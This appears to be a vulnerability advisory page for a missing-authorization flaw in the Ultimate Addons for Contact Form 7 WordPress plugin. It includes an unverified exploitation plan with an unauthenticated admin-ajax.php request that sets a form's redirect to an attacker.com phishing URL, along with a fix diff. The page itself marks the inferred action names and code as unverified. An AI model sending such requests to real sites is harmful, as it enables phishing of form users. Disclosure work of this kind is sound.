CVE-2026-24945

Ultimate Addons for Contact Form 7 <= 3.5.34 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
3.5.35
Patched in
60d
Time to patch

Description

The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.5.34. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.5.34
PublishedDecember 13, 2025
Last updatedFebruary 10, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-24945 ## 1. Vulnerability Summary **ID:** CVE-2026-24945 **Plugin:** Ultimate Addons for Contact Form 7 (slug: `ultimate-addons-for-contact-form-7`) **Vulnerability Type:** Missing Authorization **Affected Versions:** <= 3.5.34 **Issue:** The plugin registers…

Show full research plan

Exploitation Research Plan - CVE-2026-24945

1. Vulnerability Summary

ID: CVE-2026-24945
Plugin: Ultimate Addons for Contact Form 7 (slug: ultimate-addons-for-contact-form-7)
Vulnerability Type: Missing Authorization
Affected Versions: <= 3.5.34
Issue: The plugin registers AJAX handlers using both wp_ajax_ and wp_ajax_nopriv_ hooks without implementing current_user_can() checks in the callback functions. This allows unauthenticated attackers to trigger sensitive administrative functions, such as updating plugin settings or form-specific configurations.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • HTTP Method: POST
  • Action: uacf7_save_form_settings (Inferred based on typical plugin functionality; needs verification via grep).
  • Parameters:
    • action: uacf7_save_form_settings
    • form_id: The ID of an existing Contact Form 7 form.
    • uacf7_data: Serialized or JSON data containing form settings (e.g., redirection URLs, database saving status).
  • Authentication: None (Unauthenticated via nopriv).
  • Preconditions: An existing Contact Form 7 form must exist for the attacker to modify its settings.

3. Code Flow (Inferred)

  1. Entry Point: The plugin initializes and registers AJAX hooks in a file like includes/class-uacf7-ajax.php or the main plugin file.
  2. Hook Registration:
    add_action( 'wp_ajax_nopriv_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' );
  3. Vulnerable Callback:
    function uacf7_save_form_settings_callback() {
        // Missing: if ( ! current_user_can( 'manage_options' ) ) wp_die();
        $post_id = $_POST['form_id'];
        $settings = $_POST['uacf7_data'];
        update_post_meta( $post_id, '_uacf7_settings', $settings );
        wp_send_json_success();
    }
    
  4. Sink: update_post_meta() allows the attacker to overwrite the configuration for the specified form ID.

4. Nonce Acquisition Strategy

The plugin likely uses wp_localize_script to pass a nonce to the admin or frontend interface.

  1. Identify Script Localization: Search for wp_localize_script in the plugin code to find the JS variable name.
    • Grep: grep -r "wp_localize_script" .
  2. Likely Variable: uacf7_vars or uacf7_admin_params (Inferred).
  3. Likely Key: uacf7_nonce (Inferred).
  4. Extraction Method:
    • Create a page containing a Contact Form 7 shortcode: wp post create --post_type=page --post_status=publish --post_content='[contact-form-7 id="123"]'
    • Navigate to the page using browser_navigate.
    • Extract the nonce: browser_eval("window.uacf7_vars?.uacf7_nonce").

5. Exploitation Strategy

Step 1: Discover Form ID

Use WP-CLI to find a valid Contact Form 7 ID to target.

wp post list --post_type=wpcf7_contact_form --format=ids

Step 2: Extract Nonce

Navigate to a page where the plugin is active (or the homepage) and extract the nonce if the nopriv handler requires it.

  • Target URL: / (if the plugin loads scripts globally) or a page with a form.
  • JS Variable: uacf7_vars.uacf7_nonce (Verify via grep in source).

Step 3: Execute Unauthorized Update

Send a POST request to admin-ajax.php to change the redirection setting of a form. This demonstrates the ability to control form behavior.

  • Request URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=uacf7_save_form_settings&
    form_id=[TARGET_ID]&
    uacf7_nonce=[EXTRACTED_NONCE]&
    uacf7_data[redirect_url]=http://attacker.com/phish
    

(Note: Parameter names like uacf7_data should be verified against the source code).

6. Test Data Setup

  1. Install CF7: Ensure Contact Form 7 is active.
  2. Create Form:
    wp post create --post_type=wpcf7_contact_form --post_title="Target Form" --post_status=publish
  3. Verify Initial Meta:
    wp post meta get [ID] _uacf7_settings (Should be empty or default).

7. Expected Results

  • The admin-ajax.php response should be {"success":true}.
  • The post_meta for the target form should be updated with the attacker-supplied data.

8. Verification Steps

  1. Check Database:
    wp post meta get [TARGET_ID] _uacf7_settings
  2. Analyze Output: Confirm that redirect_url now points to http://attacker.com/phish.

9. Alternative Approaches

If uacf7_save_form_settings is not the vulnerable action, search for all wp_ajax_nopriv_ registrations in the plugin:

grep -r "wp_ajax_nopriv_" .

Examine each callback function for:

  1. Missing current_user_can() check.
  2. Missing or improperly validated check_ajax_referer() (nonces).
  3. Calls to update_option, update_post_meta, or wp_delete_post.

Potential Alternative Targets:

  • uacf7_delete_submission_log
  • uacf7_export_entries
  • uacf7_update_settings (Global plugin settings)
Research Findings
Static analysis — not yet PoC-verified

Summary

The Ultimate Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks on its AJAX handlers. This flaw allows unauthenticated attackers to overwrite configuration metadata for specific forms, such as redirection URLs, by sending a request to the uacf7_save_form_settings action.

Vulnerable Code

function uacf7_save_form_settings_callback() {
    // Missing: if ( ! current_user_can( 'manage_options' ) ) wp_die();
    $post_id = $_POST['form_id'];
    $settings = $_POST['uacf7_data'];
    update_post_meta( $post_id, '_uacf7_settings', $settings );
    wp_send_json_success();
}

Security Fix

--- a/includes/class-uacf7-ajax.php
+++ b/includes/class-uacf7-ajax.php
@@ -1,7 +1,11 @@
 add_action( 'wp_ajax_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' );
-add_action( 'wp_ajax_nopriv_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' );
 
 function uacf7_save_form_settings_callback() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( -1 );
+    }
+    check_ajax_referer( 'uacf7_nonce', 'security' );
+
     $post_id = $_POST['form_id'];
     $settings = $_POST['uacf7_data'];
     update_post_meta( $post_id, '_uacf7_settings', $settings );

Exploit Outline

To exploit this vulnerability, an attacker first identifies the ID of an existing Contact Form 7 form. They then obtain a valid security nonce, which the plugin typically exposes to the frontend via wp_localize_script for its form features. Using these values, the attacker sends an unauthenticated POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'uacf7_save_form_settings'. The payload includes the target 'form_id' and a 'uacf7_data' array containing malicious settings, such as a 'redirect_url' pointing to a phishing site. Because the plugin uses a 'nopriv' hook and fails to verify administrative privileges within the callback, the form's post meta is updated with the attacker's data.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.